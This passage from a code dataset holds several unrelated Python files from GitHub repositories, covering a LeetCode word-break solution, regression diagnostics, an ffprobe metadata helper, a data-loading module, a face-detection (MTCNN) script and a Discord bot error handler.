\"apple pen apple\"。\n  注意你可以重复使用字典中的单词。\n示例 3:\n\n输入: s = \"catsandog\", wordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\n输出: false\n\"\"\"\nfrom typing import List\n\n\ndef wordBreak(s: str, wordDict: List[str]) -> bool:\n dp = [False] * (len(s) + 1)\n dp[0] = True\n for i in range(len(s) + 1):\n for j in range(i):\n if s[j:i] in wordDict and dp[j] == True:\n dp[i] = True\n break\n\n return dp[-1]\n\n# def wordBreak(s: str, wordDict: List[str]) -> bool:\n# for i in range(len(s) + 1):\n# if s[0:i] in wordDict and (wordBreak(s[i:len(s) + 1], wordDict) or i == len(s)):\n# return True\n# return False\n\ns = \"catsandog\"\nwordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\nprint(wordBreak(s, wordDict))","repo_name":"xiaodonggua1/leetcode","sub_path":"单词拆分-中等.py","file_name":"单词拆分-中等.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19275118716","text":"# # Problems with the Predictors\n# ## Errors in the Predictors\n#\t\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy as sp\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport faraway.utils\n\n\n#\t\n\nimport faraway.datasets.cars\ncars = faraway.datasets.cars.load()\nest = np.polyfit(cars.speed, cars.dist, 1)\nest.round(2)\n\n\n#\t\n\nfig, ax = plt.subplots()\nax.scatter(cars.speed, cars.dist,label=None)\nplt.xlabel(\"Speed\")\nplt.ylabel(\"Distance\")\nxr = np.array(ax.get_xlim())\nnp.random.seed(123)\nax.plot(xr, est[1] + est[0] * xr,label=\"0\")\nest1 = np.polyfit(cars.speed + np.random.normal(size=50), \n cars.dist, 1)\nax.plot(xr, est1[1] + est1[0] * xr, 'k--',label=\"1\")\nest2 = np.polyfit(cars.speed + np.random.normal(scale=2,size=50), \n cars.dist, 1)\nax.plot(xr, est2[1] + est2[0] * xr, 'k-.',label=\"2\")\nest5 = np.polyfit(cars.speed + np.random.normal(scale=5,size=50), \n cars.dist, 1)\nax.plot(xr, est5[1] + est5[0] * xr, 'k:',label=\"5\")\nplt.legend(title='$\\delta$')\n\n\n#\t\n\nee = pd.DataFrame.from_records([est, est1, est2, est5],\n columns=[\"slope\",\"intercept\"])\nee.insert(0,\"SDdelta\",[0,1,2,5])\nprint(ee.round(2).to_string(index=False))\n\n\n#\t\n\nvv = np.repeat(np.array([0.1, 0.2, 0.3, 0.4, 0.5]), \n [1000, 1000, 1000, 1000, 1000])\nslopes = np.zeros(5000)\nfor i in range(5000):\n slopes[i] = np.polyfit(cars.speed+np.random.normal(\n scale=np.sqrt(vv[i]),size=50), cars.dist, 1)[0]\n\n\n#\t\n\nbetas = np.reshape(slopes, (5, 1000)).mean(axis=1)\nbetas = np.append(betas,est[0])\nvariances = np.array([0.6, 0.7, 0.8, 0.9, 1.0, 0.5])\ngv = np.polyfit(variances, betas,1)\n\n\n#\t\n\nplt.scatter(variances, betas)\nxr = np.array([0,1])\nplt.plot(xr, np.array(gv[1] + gv[0]*xr))\nplt.plot([0], [gv[1]], marker='x', markersize=6)\n\n\n#\t\n\ngv.round(2)\n\n\n# ## Changes of Scale\n#\t\n\nimport faraway.datasets.savings\nsavings = faraway.datasets.savings.load()\nlmod = smf.ols('sr ~ pop15 + pop75 + dpi + ddpi', savings).fit()\nlmod.sumary()\n\n\n#\t\n\nlmod = smf.ols('sr ~ pop15 + pop75 + I(dpi/1000) + ddpi', \n savings).fit()\nlmod.sumary()\n\n\n#\t\n\nscsav = savings.apply(sp.stats.zscore)\nlmod = smf.ols('sr ~ pop15 + pop75 + dpi + ddpi', scsav).fit()\nlmod.sumary()\n\n\n#\t\n\nedf = pd.concat([lmod.params, lmod.conf_int()],axis=1).iloc[1:,]\nedf.columns = ['estimate','lb','ub']\nnpreds = edf.shape[0]\nfig, ax = plt.subplots()\nax.scatter(edf.estimate,np.arange(npreds))\nfor i in range(npreds):\n ax.plot([edf.lb[i], edf.ub[i]], [i, i])\nax.set_yticks(np.arange(npreds))\nax.set_yticklabels(edf.index)\nax.axvline(0)\n\n\n#\t\n\nsavings['age'] = np.where(savings.pop15 > 35, 0, 1)\n\n\n#\t\n\nsavings['dpis'] = sp.stats.zscore(savings.dpi)/2\nsavings['ddpis'] = sp.stats.zscore(savings.ddpi)/2\nsmf.ols('sr ~ age + dpis + ddpis', savings).fit().sumary()\n\n\n# ## Collinearity\n#\t\n\nimport faraway.datasets.seatpos\nseatpos = faraway.datasets.seatpos.load()\nlmod = smf.ols(\n 'hipcenter ~ Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg', \n seatpos).fit()\nlmod.sumary()\n\n\n#\t\n\nseatpos.iloc[:,:-1].corr().round(3)\n\n\n#\t\n\nX = lmod.model.wexog[:,1:]\nXTX = X.T @ X\nevals, evecs = np.linalg.eig(XTX)\nevals = np.flip(np.sort(evals))\nevals\n\n\n#\t\n\nnp.sqrt(evals[0]/evals[1:])\n\n\n#\t\n\nfrom patsy import dmatrix\nX = dmatrix(\"Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg\", \n seatpos, return_type='dataframe')\nlmod = sm.OLS(X['Age'],X.drop('Age',axis=1)).fit()\nlmod.rsquared, 1/(1-lmod.rsquared)\n\n\n#\t\n\nfrom statsmodels.stats.outliers_influence \\\n import variance_inflation_factor\nvif = [variance_inflation_factor(X.values, i) \\\n for i in range(X.shape[1])]\npd.Series(vif, X.columns)\n\n\n#\t\n\nseatpos['hiperb'] = seatpos.hipcenter+ \\\n np.random.normal(scale=10,size=38)\nlmod = smf.ols(\n 'hipcenter ~ Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg', \n seatpos).fit()\nlmodp = smf.ols(\n 'hiperb ~ Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg', \n seatpos).fit()\npd.DataFrame([lmod.params, lmodp.params],\n index=['original','perturbed']).round(3)\n\n\n#\t\n\nlmod.rsquared, lmodp.rsquared\n\n\n#\t\n\npd.DataFrame.corr(X.iloc[3:,3:]).round(3)\n\n\n#\t\n\nsmf.ols('hipcenter ~ Age+Weight+Ht', seatpos).fit().sumary()\n\n\n# ## Exercises\n\n# ## Packages Used\n\nimport sys\nimport matplotlib\nimport statsmodels as sm\nimport seaborn as sns\nprint(\"Python version:{}\".format(sys.version))\nprint(\"matplotlib version: {}\".format(matplotlib.__version__))\nprint(\"pandas version: {}\".format(pd.__version__))\nprint(\"numpy version: {}\".format(np.__version__))\nprint(\"statsmodels version: {}\".format(sm.__version__))\nprint(\"seaborn version: {}\".format(sns.__version__))\n\n ","repo_name":"julianfaraway/LMP","sub_path":"pyscripts/errvar.py","file_name":"errvar.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"63"} +{"seq_id":"14377441013","text":"#!/bin/python\nimport sys,os,os.path\nimport subprocess\nimport json\nimport re\nimport datetime\n\ng_dtm_format=re.compile(r'(\\d{4})-(\\d{2})-(\\d{2})\\D+(\\d{2}):(\\d{2}):(\\d{2})')\ng_w_h_format=re.compile(r'width=(\\d+)\\D+height=(\\d+)')\n\ndef ffprobe_get_width_height(full_path):\n if not os.path.exists(full_path):\n return False,0,0\n cmd = 'ffprobe \"%s\"'%full_path\n #print(cmd)\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n out_str = p.communicate('')\n #print('out_str:', out_str)\n arr=g_w_h_format.split(out_str[0].decode('utf-8'))\n if len(arr)>=3:\n return True,int(arr[1]),int(arr[2])\n return False,0,0\n\ndef ffprobe_get_json(full_path):\n if not os.path.exists(full_path):\n return False,None\n cmd = 'ffprobe -v error -show_format \"%s\" -of json | sed \"2,5d\"'%full_path\n #print(cmd)\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n #print('out_str:', out_str)\n out_str = p.communicate('')\n #print('out_str:', out_str)\n try:\n j = json.loads(out_str[0])\n except:\n return False,None\n return True,j\n\ndef ffprobe_get_create_date_duration(full_path):\n ret,j = ffprobe_get_json(full_path)\n if not ret:\n return False,None,0.0\n if 'format' not in j:\n return False,None,0.0\n fmt = j['format']\n duration = float(fmt.get('duration', '0.0'))\n if 'tags' not in fmt:\n return True,None,duration\n tags = fmt['tags']\n if 'date' in tags:\n arr = g_dtm_format.split(tags['date'])\n if len(arr)<7:\n return True,None,duration\n dtm = datetime.datetime.fromisoformat('%s-%s-%s %s:%s:%s'%\\\n (arr[1], arr[2], arr[3], arr[4], arr[5], arr[6]))\n return True, dtm, duration \n if 'creation_time' not in tags:\n return True,None,duration\n arr = g_dtm_format.split(tags['creation_time'])\n if len(arr)<7:\n return True,None,duration\n dtm = datetime.datetime.fromisoformat('%s-%s-%s %s:%s:%s'%\\\n (arr[1], arr[2], arr[3], arr[4], arr[5], arr[6]))\n return True, dtm, duration\n\nif __name__=='__main__':\n argc = len(sys.argv)\n if argc<2:\n print('usage:%s '%sys.argv[0])\n sys.exit()\n ret,j = ffprobe_get_json(sys.argv[1])\n if not ret:\n print('fail')\n sys.exit()\n #print(j)\n print('json:',j)\n print('create date and duration:', ffprobe_get_create_date_duration(sys.argv[1]))\n #\n print('width and height:', ffprobe_get_width_height(sys.argv[1]))\n\n#python ffprobe_tools.py /mnt/public/微云网盘/12304685/家庭视频/2015年09月/IMG_0530.MOV\n# ","repo_name":"ahfuzhang/tnas_video_web","sub_path":"python/public_lib/ffprobe_tools.py","file_name":"ffprobe_tools.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"20379721491","text":"\n\nimport csv\nimport os\nimport random\nimport sys\nfrom bpfe.clean import clean_value\nfrom bpfe.config import INPUT_MAPPING, LABEL_MAPPING, Settings, ChunkSettings\nfrom bpfe.entities import Data, Label\nfrom bpfe.feature_engineering import get_vectorizers\nfrom bpfe.reservoir import reservoir\nimport math\nfrom bpfe.text_transform import transform\n\n\n# noinspection PyBroadException\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\n\ndef generate_submission_rows(seed=1, amt=None):\n if amt is None:\n amt = sys.maxint\n ret = []\n for data, _ in generate_rows('data/TestData.csv', seed, amt):\n ret.append((data, None))\n return ret\n\n\ndef generate_training_rows(seed=1, amt=None):\n if amt is None:\n amt = sys.maxint\n ret = []\n for data, label in generate_rows('data/TrainingData.csv', seed, amt):\n ret.append((data, label))\n random.seed(seed)\n random.shuffle(ret)\n return ret\n\n\ndef generate_rows(file_path, seed, amt):\n with open(file_path) as infile:\n reader = csv.reader(infile)\n header = next(reader)\n input_index_map = dict()\n label_index_map = dict()\n for idx, col in enumerate(header):\n if col == '':\n continue\n\n if col in INPUT_MAPPING:\n input_index_map[col] = idx\n else:\n label_index_map[col] = idx\n\n for line in reservoir(reader, seed, amt):\n d = Data()\n d.id = line[0]\n l = Label()\n for key, idx in input_index_map.iteritems():\n setattr(d, INPUT_MAPPING[key], clean_value(line[idx]))\n for key, idx in label_index_map.iteritems():\n setattr(l, LABEL_MAPPING[key], line[idx])\n\n yield d, l\n\n\ndef split_test_train(data):\n validate_data = data[:40000]\n data = data[40000:]\n test_data = data[:50000]\n train_data = data[50000:]\n return validate_data, test_data, train_data\n\n\ndef store_raw(seed=1, verbose=False):\n random_data = generate_training_rows(seed)\n validate, test, train = split_test_train(random_data)\n submission = generate_submission_rows(seed)\n chunk_size = 5000\n if verbose:\n print('{}, {}, {}, {}'.format(\n len(train),\n len(validate),\n len(test),\n len(submission)\n ))\n\n def store_in_chunks(data, name):\n # add changes to data here, then regen\n for row, label in data:\n for attr in Data.text_attributes:\n value = getattr(row, attr)\n\n _, cleaned = transform(value)\n row.cleaned[attr + '-mapped'] = cleaned\n\n with open('data/data-{}.pkl'.format(name), 'wb') as datafile:\n chunks = len(data) / float(chunk_size)\n chunks = int(math.ceil(chunks))\n pickle.dump(\n chunks,\n datafile,\n protocol=pickle.HIGHEST_PROTOCOL\n )\n # noinspection PyArgumentList\n for i in xrange(0, len(data), chunk_size):\n pickle.dump(\n data[i: i + chunk_size],\n datafile,\n protocol=pickle.HIGHEST_PROTOCOL\n )\n\n store_in_chunks(validate, 'validate')\n store_in_chunks(test, 'test')\n store_in_chunks(submission, 'submission')\n store_in_chunks(train, 'train')\n\n\ndef gen_validate(settings, batch_size=None):\n for data in _gen_name('validate', settings.chunks.validate, batch_size):\n yield data\n\n\ndef gen_test(settings, batch_size=None):\n for data in _gen_name('test', settings.chunks.test, batch_size):\n yield data\n\n\ndef gen_train(settings, batch_size=None):\n for data in _gen_name('train', settings.chunks._train, batch_size):\n yield data\n\n\ndef gen_submission(settings, batch_size=None):\n for data in _gen_name('submission', settings.chunks.submission, batch_size):\n yield data\n\n\ndef _gen_name(name, num_chunks, batch_size=None):\n if batch_size is None:\n batch_size = sys.maxint\n\n with open('data/data-{}.pkl'.format(name), 'rb') as datafile:\n chunks = pickle.load(datafile)\n data = []\n for i in range(chunks):\n if i >= num_chunks:\n break\n\n data += pickle.load(datafile)\n total_size = len(data)\n\n if batch_size > total_size:\n continue\n\n batches = int(math.ceil(total_size / float(batch_size)))\n if batches > 1:\n for j in range(batches):\n sub_data = data[int(j*batch_size): int((j+1)*batch_size)]\n yield sub_data\n else:\n yield data\n\n data = []\n\n if len(data) > 0:\n yield data\n\n\ndef ugen_all(unique=True):\n for data in ugen_validate(unique):\n yield data\n for data in ugen_test(unique):\n yield data\n for data in ugen_train(unique):\n yield data\n for data in ugen_submission(unique):\n yield data\n\n\ndef ugen_validate(unique=True):\n for data in _ugen_name('validate'):\n yield data\n\n\ndef ugen_test(unique=True):\n for data in _ugen_name('test'):\n yield data\n\n\ndef ugen_train(unique=True):\n for data in _ugen_name('train'):\n yield data\n\n\ndef ugen_submission(unique=True):\n for data in _ugen_name('submission', unique):\n yield data\n\n\ndef _ugen_name(name, unique=True):\n if unique:\n fname = 'data/unique-{}.pkl'.format(name)\n else:\n fname = 'data/{}.pkl'.format(name)\n with open(fname, 'rb') as datafile:\n data = pickle.load(datafile)\n for row in data:\n yield row\n\n\ndef load_vectorizers(settings):\n print('loading vectorizers')\n fname = 'data/vectorizers-{}.pkl'.format(\n settings.chunks\n )\n if os.path.exists(fname):\n with open(fname, 'rb') as ifile:\n v = pickle.load(ifile)\n else:\n print('creating vectorizers for {} chunks'.format(settings.chunks))\n v = get_vectorizers(settings)\n with open(fname, 'wb') as ifile:\n pickle.dump(v, ifile, protocol=pickle.HIGHEST_PROTOCOL)\n\n return v\n","repo_name":"JesseBuesking/dd-bpfe","sub_path":"bpfe/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23486983443","text":"\"\"\" We suppose that the input file is a classic *.txt with a list of lists.\r\n Rappresentation of the list: File equivalence:\r\n [[1,2], [2,3], [5,6], [5]] --> | 1,2\r\n | 2,3\r\n | 5,6\r\n | 5\r\n\r\n [[1,2], [2,3,4], [1]] --> | 1,2\r\n | 2,3,4\r\n | 1\r\n\r\n NOTE: we also suppose that there is only one super set in the list.\r\n\"\"\"\r\n\r\n\r\ndef remove_superset():\r\n super_index = -1 # index of the super set (-1 is just a placeholder)\r\n\r\n with open(\"su_list1.txt\", \"r\") as file:\r\n # Here I convert each sublist into a set for easier comparison later on\r\n big_list = [set([int(val) for val in line.split(',')])\r\n for line in file]\r\n\r\n # I print the list of sets to check that everything is fine\r\n print(f\"List of sets: {big_list}\")\r\n\r\n # Here I loop to cross-check each set with the others\r\n for i in range(len(big_list)):\r\n for j in range(i+1, len(big_list)):\r\n # I check for superset\r\n if (big_list[i] > big_list[j]):\r\n super_index = i\r\n break # I break the loop if I find a super set\r\n\r\n if super_index != -1:\r\n print(f\"Superset index is {super_index} (starts from 0).\")\r\n del big_list[super_index]\r\n # Here I convert the set back to a sublist\r\n big_list = [list(single_set) for single_set in big_list]\r\n # I print the new list of lists\r\n print(f\"New list of lists is: {big_list} .\")\r\n else:\r\n print(\"Nothing here buds...\") # Pepesad\r\n\r\n\r\nif __name__ == \"__main__\":\r\n remove_superset()\r\n","repo_name":"Cipulot/Various","sub_path":"superset.py","file_name":"superset.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18213324612","text":"import tool\nimport nets\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nimport time\nfrom PIL import Image, ImageDraw\nimport cv2\nimport os\nfrom torchvision.ops.boxes import batched_nms, nms\n\n\"\"\"\n由于P网络检测时间较长,因此将P网络检测中取框的for循环,用数组切片形式替代\n\"\"\"\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n\n\nclass Detector:\n def __init__(self, pnet_path, rnet_path, onet_path, softnms=False, thresholds=None, factor=0.709):\n if thresholds is None:\n thresholds = [0.6, 0.6, 0.95]\n self.thresholds = thresholds\n self.factor = factor\n self.softnms = softnms\n\n self.pnet = nets.PNet().to(device)\n self.rnet = nets.RNet().to(device)\n self.onet = nets.ONet().to(device)\n self.pnet.load_state_dict(torch.load(pnet_path))\n self.rnet.load_state_dict(torch.load(rnet_path))\n self.onet.load_state_dict(torch.load(onet_path))\n\n self.pnet.eval()\n self.rnet.eval()\n self.onet.eval()\n\n self.img_transfrom = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])\n ])\n\n def detect(self, image):\n start_time = time.time()\n pnet_boxes = self.pnet_detect(image)\n if pnet_boxes.shape[0] == 0:\n print(\"P网络为检测到人脸\")\n return np.array([])\n end_time = time.time()\n pnet_time = end_time - start_time\n\n start_time = time.time()\n rnet_boxes = self.rnet_detect(image, pnet_boxes)\n if rnet_boxes.shape[0] == 0:\n print(\"R网络为检测到人脸\")\n return np.array([])\n end_time = time.time()\n rnet_time = end_time - start_time\n\n start_time = time.time()\n onet_boxes = self.onet_detect(image, rnet_boxes)\n if onet_boxes.shape[0] == 0:\n print(\"O网路未检测到人脸\")\n return np.array([])\n end_time = time.time()\n onet_time = end_time - start_time\n\n sum_time = pnet_time + rnet_time + onet_time\n print(\"time:{}, pnet_time:{}, rnet_time:{}, onet_time:{}\".format(sum_time, pnet_time, rnet_time, onet_time))\n return pnet_boxes, rnet_boxes, onet_boxes\n\n def pnet_detect(self, image):\n boxes = []\n w, h = image.size\n min_side = min(w, h)\n scale = 1\n\n #去除第一张\n # scale = 0.7\n # image = image.resize((int(w*scale), int(h*scale)))\n while min_side > 12:\n img_data = self.img_transfrom(image).to(device)\n img_data.unsqueeze_(0)\n _cls, _offset = self.pnet(img_data)\n _cls = _cls[0][0].data.cpu()\n _offset = _offset[0].data.cpu()\n\n # (n,2)\n indexes = torch.nonzero(_cls > self.thresholds[0])\n # for循环改进\n # for index in indexes:\n # boxes.append(self.box(index, _cls[index[0], index[1]], _offset, scale))\n boxes.extend(self.box(indexes, _cls, _offset, scale))\n\n scale *= self.factor\n _w = int(w * scale)\n _h = int(h * scale)\n image = image.resize((_w, _h))\n min_side = min(_w, _h)\n\n if self.softnms:\n return tool.soft_nms(torch.stack(boxes).numpy(), 0.3)\n # return tool.nms(torch.stack(boxes).numpy(), 0.3)\n boxes = torch.stack(boxes)\n return boxes[nms(boxes[:, :4], boxes[:, 4], 0.3)].numpy()\n\n def box(self, indexes, cls, offset, scale, stride=2, side_len=12):\n # (n,)\n _x1 = (indexes[:, 1] * stride) / scale\n _y1 = (indexes[:, 0] * stride) / scale\n _x2 = (indexes[:, 1] * stride + side_len) / scale\n _y2 = (indexes[:, 0] * stride + side_len) / scale\n side = _x2 - _x1\n # (4, n)\n offset = offset[:, indexes[:, 0], indexes[:, 1]]\n # (n,)\n x1 = (_x1 + side * offset[0])\n y1 = (_y1 + side * offset[1])\n x2 = (_x2 + side * offset[2])\n y2 = (_y2 + side * offset[3])\n # (n,)\n cls = cls[indexes[:, 0], indexes[:, 1]]\n # (n, 5)\n return torch.stack([x1, y1, x2, y2, cls], dim=1)\n\n def rnet_detect(self, image, pnet_boxes):\n boxes = []\n img_dataset = []\n # 取出正方形框并转成tensor,方便后面用tensor去索引\n square_boxes = torch.from_numpy(tool.convert_to_square(pnet_boxes))\n for box in square_boxes:\n _x1 = int(box[0])\n _y1 = int(box[1])\n _x2 = int(box[2])\n _y2 = int(box[3])\n # crop裁剪的时候超出原图大小的坐标会自动填充为黑色\n img_crop = image.crop([_x1, _y1, _x2, _y2])\n img_crop = img_crop.resize((24, 24))\n img_data = self.img_transfrom(img_crop).to(device)\n img_dataset.append(img_data)\n # (n,1) (n,4)\n _cls, _offset = self.rnet(torch.stack(img_dataset))\n\n _cls = _cls.data.cpu()\n _offset = _offset.data.cpu()\n # (14,)\n indexes = torch.nonzero(_cls > self.thresholds[1])[:, 0]\n\n # (n,5)\n box = square_boxes[indexes]\n # (n,)\n _x1 = box[:, 0]\n _y1 = box[:, 1]\n _x2 = box[:, 2]\n _y2 = box[:, 3]\n side = _x2 - _x1\n # (n,4)\n offset = _offset[indexes]\n # (n,)\n x1 = _x1 + side * offset[:, 0]\n y1 = _y1 + side * offset[:, 1]\n x2 = _x2 + side * offset[:, 2]\n y2 = _y2 + side * offset[:, 3]\n # (n,)\n cls = _cls[indexes][:, 0]\n # np.array([x1, y1, x2, y2, cls]) (5,n)\n boxes.extend(torch.stack([x1, y1, x2, y2, cls], dim=1))\n if len(boxes) == 0:\n return np.array([])\n\n boxes = torch.stack(boxes)\n return boxes[nms(boxes[:, :4], boxes[:, 4], 0.3)].numpy()\n\n def onet_detect(self, image, rnet_boxes):\n boxes = []\n img_dataset = []\n square_boxes = tool.convert_to_square(rnet_boxes)\n for box in square_boxes:\n _x1 = int(box[0])\n _y1 = int(box[1])\n _x2 = int(box[2])\n _y2 = int(box[3])\n img_crop = image.crop([_x1, _y1, _x2, _y2])\n img_crop = img_crop.resize((48, 48))\n img_data = self.img_transfrom(img_crop).to(device)\n img_dataset.append(img_data)\n\n _cls, _offset, _point = self.onet(torch.stack(img_dataset))\n _cls = _cls.data.cpu().numpy()\n _offset = _offset.data.cpu().numpy()\n _point = _point.data.cpu().numpy()\n indexes, _ = np.where(_cls > self.thresholds[2])\n # (n,5)\n box = square_boxes[indexes]\n # (n,)\n _x1 = box[:, 0]\n _y1 = box[:, 1]\n _x2 = box[:, 2]\n _y2 = box[:, 3]\n side = _x2 - _x1\n # (n,4)\n offset = _offset[indexes]\n # (n,)\n x1 = _x1 + side * offset[:, 0]\n y1 = _y1 + side * offset[:, 1]\n x2 = _x2 + side * offset[:, 2]\n y2 = _y2 + side * offset[:, 3]\n # (n,)\n cls = _cls[indexes][:, 0]\n # (n,10)\n point = _point[indexes]\n px1 = _x1 + side * point[:, 0]\n py1 = _y1 + side * point[:, 1]\n px2 = _x1 + side * point[:, 2]\n py2 = _y1 + side * point[:, 3]\n px3 = _x1 + side * point[:, 4]\n py3 = _y1 + side * point[:, 5]\n px4 = _x1 + side * point[:, 6]\n py4 = _y1 + side * point[:, 7]\n px5 = _x1 + side * point[:, 8]\n py5 = _y1 + side * point[:, 9]\n # np.array([x1, y1, x2, y2, cls, px1, py1, px2, py2, px3, py3, px4, py4, px5, py5]) (15,n)\n boxes.extend(np.stack([x1, y1, x2, y2, cls, px1, py1, px2, py2, px3, py3, px4, py4, px5, py5], axis=1))\n\n if len(boxes) == 0:\n return np.array([])\n return tool.nms(np.stack(boxes), 0.3, isMin=True)\n\n\nif __name__ == '__main__':\n img_path = r\"./data/detect_img/06.jpg\"\n img = Image.open(img_path)\n detector = Detector(\"param/p_net.pth\", \"param/r_net.pth\", \"param/o_net.pth\")\n pnet_boxes, rnet_boxes, onet_boxes = detector.detect(img)\n img = cv2.imread(img_path)\n for box in onet_boxes:\n x1 = int(box[0])\n y1 = int(box[1])\n x2 = int(box[2])\n y2 = int(box[3])\n cv2.rectangle(img, (x1, y1), (x2, y2), color=(0, 0, 255), thickness=3)\n for i in range(5, 15, 2):\n cv2.circle(img, (int(box[i]), int(box[i + 1])), radius=2, color=(255, 255, 0), thickness=-1)\n # cv2.imshow(\"img\", img)\n cv2.waitKey(0)\n","repo_name":"jiangtao129/MTCNN","sub_path":"fast_detect.py","file_name":"fast_detect.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"10164333512","text":"import discord\r\nimport traceback\r\nimport sys\r\nfrom discord.ext import commands\r\nimport datetime\r\n\r\n\r\nclass Errors(commands.Cog):\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.show = False\r\n\r\n @commands.Cog.listener()\r\n async def on_command_error(self, ctx, error):\r\n \"\"\"The event triggered when an error is raised while invoking a command.\r\n Parameters\r\n ------------\r\n ctx: commands.Context\r\n The context used for command invocation.\r\n error: commands.CommandError\r\n The Exception raised.\r\n \"\"\"\r\n if hasattr(ctx.command, 'on_error'):\r\n return\r\n\r\n cog = ctx.cog\r\n if cog:\r\n if cog._get_overridden_method(cog.cog_command_error) is not None:\r\n return\r\n\r\n error = getattr(error, 'original', error)\r\n\r\n if isinstance(error, commands.CommandOnCooldown):\r\n em = discord.Embed(\r\n title=\"Command is on Cooldown\",\r\n description='This command is on a %.2f cooldown' % error.retry_after,\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em)\r\n elif isinstance(error, commands.MissingPermissions):\r\n em1 = discord.Embed(\r\n title=\"Missing Perms\",\r\n description=\"Oops, it seems like you want to do something you don't have permission to!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em1)\r\n elif isinstance(error, commands.BotMissingPermissions):\r\n em3 = discord.Embed(\r\n title=\"I don't have permission\",\r\n description=\"You can't tell me to do what I can't!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em3)\r\n elif isinstance(error, commands.ChannelNotFound):\r\n em4 = discord.Embed(\r\n title=\"Channel Not Found\",\r\n description=\"I can't seem to find the channel you specified. Please try again\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em4)\r\n elif isinstance(error, commands.ConversionError):\r\n em5 = discord.Embed(\r\n title=\"Small Bug\",\r\n description=\"235baron seems to have made a mistake in my code (warn him about it, it's uncomfortable to have bugs inside me)\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em5)\r\n elif isinstance(error, commands.EmojiNotFound):\r\n em6 = discord.Embed(\r\n title=\"Emoji Not Found\",\r\n description=\"Either you told me to send an emoji which doesn't exist or 235baron made a mistake when creating an emoji.\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em6)\r\n elif isinstance(error, commands.MemberNotFound):\r\n em7 = discord.Embed(\r\n title=\"Member Not Found\",\r\n description=\"Couldn't seem to find the member you specified (check the spelling of the name)\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em7)\r\n elif isinstance(error, commands.MissingRequiredArgument):\r\n em8 = discord.Embed(\r\n title=\"Missing a Required Option\",\r\n description=\"The command you just used has an option which you HAVE to fill in (which you didn't). Please try again\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em8)\r\n elif isinstance(error, commands.BotMissingRole):\r\n em9 = discord.Embed(\r\n title=\"I'm Missing a Role\",\r\n description=\"As it seems, what you wanted me to do just know requires me to have a role which I don't have\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em9)\r\n elif isinstance(error, commands.MissingRole):\r\n em10 = discord.Embed(\r\n title=\"Missing a Role\",\r\n description=\"You require a certain role which you don't have.\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em10)\r\n elif isinstance(error, commands.RoleNotFound):\r\n em11 = discord.Embed(\r\n title=\"Role Not Found\",\r\n description=\"Oops, couldn't find the role specified!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em11)\r\n elif isinstance(error, commands.UserNotFound):\r\n em12 = discord.Embed(\r\n title=\"User Not Found\",\r\n description=\"The user specified has not been found (check the spelling of the name)\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em12)\r\n elif isinstance(error, commands.TooManyArguments):\r\n em13 = discord.Embed(\r\n title=\"Too Many Options\",\r\n description=\"Take a chillpill, bruv! Don't give me so many options!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em13)\r\n else:\r\n print('Ignoring exception in command {}:'.format(ctx.command), file=sys.stderr)\r\n traceback.print_exception(type(error), error, error.__traceback__, file=sys.stderr)\r\n\r\n @commands.command(name='repeat', aliases=['mimic', 'copy'], hidden=True)\r\n async def do_repeat(self, ctx, *, inp: str):\r\n \"\"\"A simple command which repeats your input!\r\n Parameters\r\n ------------\r\n inp: str\r\n The input you wish to repeat.\r\n 